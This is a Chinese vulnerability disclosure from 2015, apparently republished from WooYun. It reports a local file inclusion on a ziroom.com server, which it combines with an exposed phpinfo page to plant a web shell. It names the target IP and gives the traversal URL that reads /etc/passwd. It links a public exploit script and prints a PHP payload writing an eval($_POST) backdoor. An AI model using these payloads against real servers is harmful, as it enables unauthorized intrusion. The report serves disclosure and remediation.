自如网某业务文件包含导致命令执行(LFI + PHPINFO getshell 实例)

2015-12-16 3,884
漏洞标题 自如网某业务文件包含导致命令执行(LFI + PHPINFO getshell 实例)
相关厂商 ziroom.com
漏洞作者 只抽红梅
提交时间 2015-11-04 09:07
公开时间 2015-11-09 09:08
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 20
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 webshell,文件上传漏洞

漏洞详情

LFI + PHPINFO getshell 这个漏洞利用技巧请参考:

https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf

利用工具下载地址:https://www.insomniasec.com/downloads/publications/phpinfolfi.py

下面说自如网的问题:

1. 文件包含漏洞:http://119.254.70.190/?_p=../../../../../../../../../../etc/passwd%00.jpg

2. PHPINFO:http://119.254.70.190/phpinfo.php

用上面文档中的利用代码进行测试即可,代码需要进行部分修改:

1. 根据上面漏洞信息进行修改

2. Payload 代码我替换为:<?php $c=fopen('/tmp/l','w');fwrite($c,'<?php eval($_POST["l"]);?>');?>

3. 代码中有两处 find tmp_name 需要替换成:i = d.find("[tmp_name] =&gt; ")

证明如下:

QQ20151104-2@2x.png

lianjia2.png

漏洞证明:

证明如下:

QQ20151104-2@2x.png

lianjia2.png

修复方案:

1. 删除 PHPINFO 文件

2. 修复文件包含漏洞

版权声明:转载请注明来源 只抽红梅@乌云

Tags:
评论  (0)
快来写下你的想法吧!

Chloe O_o

文章数:38595 积分: 0

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号